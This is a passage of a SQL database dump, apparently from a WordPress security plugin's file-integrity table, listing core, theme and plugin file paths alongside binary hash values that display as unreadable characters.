:6�C','��s\"�Ҍ�Ngh�Y�ř�/g�e.��~j','',0,'?'),('�^3w\nyމ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�%$�$�H�b@��','Ίa����AcZ�����\"g8�>h�.@��Cs','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('�(T/I�����e�vB','wp-includes/blocks/table/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"9�T�ʳ��H��','�mX�4����3�ӈ�&�;a�����\"0�z','',0,'?'),('������cE0OŦ�-','wp-content/themes/vega/parts/frontpage-4cols.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1�ώVRf�W�^�','�\'O*\'(�K��Z���syƕ\'d�d�#|��Te�','',0,'?'),('�r����d@X>fM�','wp-content/plugins/wordpress-seo/js/dist/admin-global-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2o�wϱ�%0�4tb','*�$d�;�C&ӈ��Rl]�G6Y�,j�$ͽ�:','',0,'?'),('�!�(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����) ','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I gƅ\Z:���','|�N5ȩ*͟��h7j�.�x���}�ʗ����','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n � ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�Z/ǜE)b�8!&��e','wp-content/plugins/wp-cerber/languages/wp-cerber-ja.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.\\c6��N!5M��','�Xv�?�v�\\�hD�E�����X@�a\n�','',0,'?'),('�c}b��fɰ܀�y�B','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/Password.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n��q���<�7��','\n��Zn�B��8)���C\'g��jW�M���xi','',0,'?'),('�f� ���(7�j�','wp-content/plugins/wordpress-seo/images/link-in-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�4t��1D���','��?ӽp���M�R���\nI�����m�#�','',0,'?'),('�p�������4���{','wp-content/plugins/wp-cerber/assets/flags/tj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EK|��$1��(','5���J �A��a�\\L�dz���4���~U�','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('�|�*w/\ZT�*�6��bJ','wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�YR��Z�','���d\nB��^� �ԙ8V{}���!���}�','',0,'?'),('��(���w��S��O','wp-content/plugins/wordpress-seo/src/integrations/front-end/handle-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>z���M.�\n��\0�','0ގ/�UC*�@�vq��И��/s��i\rF�','',0,'?'),('����X{���p ��1{','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e/Z �%�}��`�','?�Ѕ �ܹ\Z�#�9��D!��N�*!uo�t','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�gv�\r]�G�ط�','l�`A��mS��<0p8Zs�~�x@��S[�','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+ ]\r-W�ҽ���','2j��ˏ��jB��\\�Cv���q���,�\'��F�','',0,'?'),('��K}:�a<��U�+#','wp-content/plugins/wordpress-seo/lib/migrations/table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tʷzՑ����O�?V','��3�t<)�����l���hbY�tZX?bm^','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N �S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('�ȉm���m��^m�B#','wp-content/plugins/wordpress-seo/inc/class-wpseo-statistics.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����e���T#�W��','��ݦ��t9\Zb�k�~poMl�\\;2�7�Q�','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[ $3','',0,'?'),('��(��\Z�vdv�Q�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Stream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��ϋo�f�A\"Y','I@\\ې�dw�Zp6�Ǻ��A2;4���g4','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�\r�y�R�]�x���\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�<P�S2��ȯV','Ӡ�P�G�B���$��� �JE3�n^�','',0,'?'),('�!,(?����#���','wp-content/plugins/wp-cerber/assets/flags/ck.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'[8A3��;�y��g�','��3{����;��ߍ2�Dh��}��(��','',0,'?'),('�$����R\\�r-�y','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�\'s��J����x','+{��h���/&�Z|��> ��s:!���鸮-�','',0,'?'),('�/EM�\"�ˁ4���u�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fa_IR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?���4�a \'I��','����ڂ�H|xl���tJ�By�z])9��T�T>','',0,'?'),('�:�u?͜PF��{S�M�','wp-content/plugins/wp-cerber/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.4��%h���|�*�n','&<�+���;�Wƻ���t�jmx��0:Is��','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�: ڂa�7��Zcdm��%','',0,'?'),('�W#:��V��^H3X','wp-includes/blocks/nextpage/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�`�\ZJ������$�','O��1NJ8���#���C�\\({xSzW\'L�','',0,'?'),('�o�;r��V�J�e<��','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/media-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r㲫����e�D��','w�G7���J��<��;�����~�܀�\\ٞ�m�','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�8�l,��+Tǎ','4C]�(����ߴ��f�ʙ)Ycy��$�','',0,'?'),('��9�xc�˜��T�N�T','wp-content/plugins/wordpress-seo/src/deprecated/admin/ajax/class-yoast-onpage-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',h]��*Z\nO��wz�','��(�@xF�.\rw�ܤ�F2o\\d\'QN��]���Ӻ','',0,'?'),('��@�}�~�4G�v<�m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('���+���q�pW��','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"m<��i��>��kMR','r�ۄ��(�ƅ�]�H�ָ�U.�\0�KR�FZΆ�','',0,'?'),('���qXr:�Hx�[','wp-content/plugins/wp-cerber/assets/flags/ad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\Z�3� {��/_s_5�','j�~�+��E�A�9��M���\Z��e���c0T','',0,'?'),('���`�&X<�aQ�Vh\\','wp-admin/user/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x8��!���x�S�j','��J���f�v^�D�w�ۦ\n��s�Bu�/���L','',0,'?'),('��yY)h��N��Á�','wp-includes/js/dist/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',2��1���\"9GJ�*v�','ԡ�c�%���\Z��i�>�L�͠Z�ؽ����K','',0,'?'),('���Pq-�t�@l�','wp-includes/images/wlw/wp-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1 �ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('� ���)�&��Z��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/gl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٛ�������5\\','(�Z�ǁ�q����=�K�e��_�lF�9�b','',0,'?'),('�\r�V��2P�-+x@�','wp-content/themes/twentynineteen/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���JŐ\\�;�^�q��','}�D�uغ��i��I|�{�&��މ��g��0���','',0,'?'),('��gx�A�Ȣ}�g�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]ኮ���ȣ&','��K��#�@JU�}F�����,���![','',0,'?'),('������hey��a�','wp-content/languages/plugins/wordpress-seo-en_GB-89c5264800dbd13c7bd7601e950a5800.json',0,'�A;6��u}/b(','�A;6��u}/b(','�d�I�l�0�\rKE��B�w�JU�d�F�}�{','',0,'?'),('� @�;��*�|��','wp-includes/Text/Diff/Engine/string.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('�1t�v�3�9]AaC-','wp-content/plugins/wp-cerber/assets/flags/bs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�t\Z���c��K�o�','_o &�\'����&�Q�R���~E�1�d','',0,'?'),('�2:mpRh4�tЪ\\�V','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fr_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R[]4`�}g�m�v�','�ꓤ����so��@�T�b���r����','',0,'?'),('�BGA1�O��<v*��N','wp-content/plugins/wordfence/modules/login-security/css/admin.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�:��W�ݱb','�`��ʂw��\'��J^�8V�h�o7�c�0','',0,'?'),('�C�:��U8>���h&�h','wp-content/plugins/wordpress-seo/src/integrations/front-end/force-rewrite-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Wl/G���zf�L','�H���-�.�ge�WEx�r�sLVM��~��','',0,'?'),('��]��p�R�/$�1�','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�$B`w�ƕ���','�a����6���Ο���v]z5�����\r�p�c�','',0,'?'),('������浉���C��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/6���Kd���|D','�)7; @v�L��>�]M|�c����)d����k','',0,'?'),('��u�7���A��o��2','wp-content/plugins/wordpress-seo/src/config/indexing-reasons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W fŗ���\\�2','��h��G�\0^�x�*�z$�B8�7�����','',0,'?'),('��8��C���!0��','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��f��(�\\{���','�?�F�y\Z������(���zH����A�','',0,'?'),('��\"j���V���d�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/UriNormalizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!<�Ųnd�5O`�','�}�qI:I�$u��~P P��C��\nx�<^�','',0,'?'),('��nk�A�d~���H','wp-content/uploads/2018/05/builder-150x150.jpg',0,'���Ⱥ�q^�jՖG���','���Ⱥ�q^�jՖG���','P�m��B�g���\\��>�!�zuWav�j�~','',0,'?'),('�����5��E�r','wp-content/plugins/wp-cerber/assets/flags/nr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*s�|�Ǯr�St��[','�bp%�a���,%M���q�^��4���$}�J','',0,'?'),('���JSm)h(�E▧;/','wp-content/plugins/wordpress-seo/languages/yoast-components-he_IL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ceJ`��]e�*:�','������?\"�Q�U��k�5)����','',0,'?'),('��_w�ƌ����','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('��B�H���w����','wp-content/plugins/wordpress-seo/inc/class-wpseo-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��j}�捣C�','�br���!�Q�j��@��õI�<��c��줏v�','',0,'?'),('��A-��zN���','wp-content/themes/twentynineteen/inc/helper-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŀ<)�8�j���/SԜ','�ք��8�J��j��\n�� ��g�^\'�','',0,'?'),('�-|V���H�%��','wp-admin/site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�?a��۩~S�4�\0L','JAտ�\"�S֕J��]����ŋ������','',0,'?'),('��Ǣ�Bմ(�\\�0J','wp-includes/class-wp-text-diff-renderer-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�l��_\r�u���','��פme�,��V����9�}���� y���v�','',0,'?'),('�6N]bN��R������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ �q�?s1����U','�REkks&]!i�_����\"���y~����Ka�','',0,'?'),('�;�%N!9�\nL&N���','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ᴐ�7�Am�]���','#b^�=��^Nل�6t�7F�[C1dV��','',0,'?'),('�>��I7m���>�','wp-includes/blocks/embed/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m,��-u�m���Ԫ','H��fUgqP���� ar2�䥬{~���?�','',0,'?'),('�@���sB0<�{l�3��','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('�D=������S��C','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�a*�˫Cq,p5g�','wp-content/plugins/wordpress-seo/admin/notifiers/dismissible-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�˨�P��`]oK\'[','>hLU�ƌ���� /EfOL���Z�7DC�\"�','',0,'?'),('�k����e<F��4','wp-admin/js/revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rӐn�� ����\Z','\roMQC�irtM�ҡ�����I����_','',0,'?'),('�tR���O\ZJ<�Q�g','wp-content/plugins/wordpress-seo/css/dist/modal-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�C K��B�70','x>�����_�q��M���ez�Ӂ�ˠ�','',0,'?'),('�u�\\����)��S�_','wp-content/plugins/redirection/actions/error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�_��i����_�','��d\0A�3���F�~i���JWJuk��lI','',0,'?'),('��m�O&?O���','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-youtube.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�t�(�kEz��z/��','A�+��\r��41����N�]U�d�ǻ���\n','',0,'?'),('����c�np�u�#�Y&','wp-content/plugins/wordpress-seo/admin/class-primary-term-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���myw��*lt�|�','��i�[wOz�a�X�MM�,��b��o���i���','',0,'?'),('���D��=K�49���','wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('����sY�Qeٕ~\0\Z5','wp-content/wflogs/.htaccess',0,':RV���*��bLQ���',':RV���*��bLQ���','�kZ()�x���^��w�=:���$�T�M���','',0,'?'),('�������CMp<E��','wp-includes/class-wp-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('��6+��%�ɺ �','wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml-wpseo-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� r��ZI=bq�!','�w��\0����{���s)6���2ѕi�C�','',0,'?'),('��D�ۜO�B S%��','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�<ݺ�\rXl�Ee��','��Ix+�b�y\'�r�v�]�k6h�\"+~��','',0,'?'),('���L��,9Ui*.�%�','wp-content/uploads/2016/11/roofs-updraft-pre-smush-original.jpg',0,'�<L�&QA���&��','�<L�&QA���&��','<e�D�*Fyy���@��1k����\rm;���','',0,'?'),('��6K1���(��}/AX','wp-admin/network/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��۲�A�Q��[��dK�','�&��-꽪k�@���*�:��m���M\n��','',0,'?'),('���)`ol,�l>3��','wp-content/plugins/wordpress-seo/js/dist/externals/featureFlag-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�2d���\Z)\Z��dL�','�f_c��嶵�8p|���Ɋ��oߐd���mQc','',0,'?'),('��d@��=\'*\Z�@�-','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-general-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`栽�l�Pܮ','v�w�k���\n�R��%;\"\n��SC)��,��','',0,'?'),('��3����R�C���V','wp-includes/blocks/calendar/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\n������Uz�PU��','���2aC�[[��n�k�2!\ZR3L�.6l�R�','',0,'?'),('�ݧlp�S*LST$�8/','wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�]�m��0Z3�','�N���06-h��os���i��p�','',0,'?'),('��fn5W���aL��|','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-opengraph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����j\nc\n�.��H�','�#h]y��.�|qQ�7ԲJ@o� �+�ӣ�E�','',0,'?'),('��ĩ�}x�(T��','wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����X�I8��B}e','lC8��h�yu�S�yU���S�\'�G!�\Z','',0,'?'),('�=̀�5�6���','wp-content/uploads/2019/05/automatic-gates-300x200.jpg',0,'t6���w7��;io�','t6���w7��;io�','[����Q�$�!{P���$�k)�Kk�','',0,'?'),('�V��\nT>Z���-2L','wp-content/plugins/redirection/locale/redirection-en_AU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J���l��\0]�O�!�}}','����J��y�4��s&��\ne���1��eB|Y','',0,'?'),('�^Q6l��J!� �ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��oN�.��','>4��i3�|��v1�N��6�wD�)M��jr','',0,'?'),('��+�x�~� yi&\0Q','wp-content/themes/twentytwentyone/template-parts/header/site-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e@ڞF\n��1���','ǛO��g�\ZXPECn��o�`�����+�i','',0,'?'),('� ń1�r}mJGW�R��','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�=�PҤ��� ','�-9��\0t��D\\6�9s]��\\e\0R�r���','',0,'?'),('�-��_&[kN�V��DN','wp-content/uploads/2016/11/roof-plate-960x580.jpg',0,'$k�[��;y�5�+�Y��','$k�[��;y�5�+�Y��','���\'�ihX|�Q��� jw{�E�xW�O��','',0,'?'),('�0�$�\'`�Õ�n�\\','wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!<��Tp���+','�I�ʌ�?�(5�]]F�r�A�~�{t�J?��','',0,'?'),('�95!��iM��~�&d','wp-content/plugins/wordpress-seo/src/builders/indexable-post-type-archive-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*eT=2�P��R��','��/�)(���X f롙\n��b�I�+|h','',0,'?'),('��ɱ%��a{Z�j %�','wp-includes/class-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' e3pN_on0��}�','���\Z���x�P�����������x�','',0,'?'),('����I�:4P�U���','wp-includes/SimplePie/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('����[܋�|���ب�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zx�R7�7P�Ӏv��','4�f�}Li�&���D��ֈ3rȭ�˻�8','',0,'?'),('���D���\"[v���i�','wp-includes/blocks/query-title/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DX�p��\Z��y?w����','n灴U����¢�H������ZO���h�?\r','',0,'?'),('��,���`�t��t�b7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MP�<^f�G�� C','V�$oBޞj��f0�֫�Qx�u�T�=a��`�K','',0,'?'),('��z��i�/��9R� ','wp-content/themes/vega/assets/css/bootstrap-social.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h8^C�:F���ٖ�','s@J�Gφ�����Rg����&.����\\�c','',0,'?'),('��8K�� ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZlY^[F\r�2xʻ','�6=���S�q�-5 )��E�L}A�ViA]���','',0,'?'),('��苼����3���','wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1V����tL,���k_�,','�\n��z#�C�Uh��4�7��)S��Xյ�e� ','',0,'?'),('����p�l4[���e��','wp-admin/js/inline-edit-tax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��,2�/b3S��','�F�c{�+�o�>\n��4���P���T,���S�','',0,'?'),('��|3A(\0��0�\'�I?','wp-content/plugins/wordpress-seo/src/commands/index-command.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��4�jcd�Y','�\"�ək=s�yYT�N L��s~1��}|�','',0,'?'),('���stqЇd$�\0|`\\m','wp-content/plugins/wordpress-seo/src/deprecated/admin/onpage/class-onpage-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@~�a�B��gz��','��O�Ll�bw���;��\\=�~�\"HF}Yi1P!k','',0,'?'),('��l]���g S�D�n','wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���mda�ׇ���','�\'ۈ%�]����k8��3���{f�xǪT','',0,'?'),('�����Ѝ3�>#�.�','wp-includes/rest-api/class-wp-rest-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('�ަ?���%B��PR�','wp-content/plugins/wordpress-seo/src/generators/generator-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jX2�� �D�r�','LB�vH��[��V�dk�Լ}lE����}�','',0,'?'),('��K|H�#�[��x��','wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z6�ܩ��%I���-','@�ܦ\'�sj\n�̓\rפ��綻�|՜�R��','',0,'?'),('�R��=��*�d��n�','wp-admin/includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c��\r��u��','��t�֞���9���ID܄z�xw·�<�m�','',0,'?'),('� e1�n2��c��Χ','wp-content/plugins/wp-cerber/assets/flags/uz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��S�UA��R-Ƌ','Ț���1}\n{%`Tbh����3�ٷ���.D�','',0,'?'),('�<wgz���+���','wp-content/plugins/wordpress-seo/languages/wordpress-seo-el.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˙x����j}�ҳ��','�R;�h9V��iI�Z���A�EV��ۮo��G�','',0,'?'),('��8��=����[ձ�','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�����iYn$�q��G�','v_��eI�ܑ������z\"��[�1\no���F','',0,'?'),('��A����)D4�','wp-includes/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s_7�;� ]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('�\"(���b?\Zg�s�q�','wp-includes/css/dist/reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JRK�N�` �1U%�','�+��,q�K�*��~��B��2���\n�ū�','',0,'?'),('�-^g��̺@\0/���','wp-content/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~ 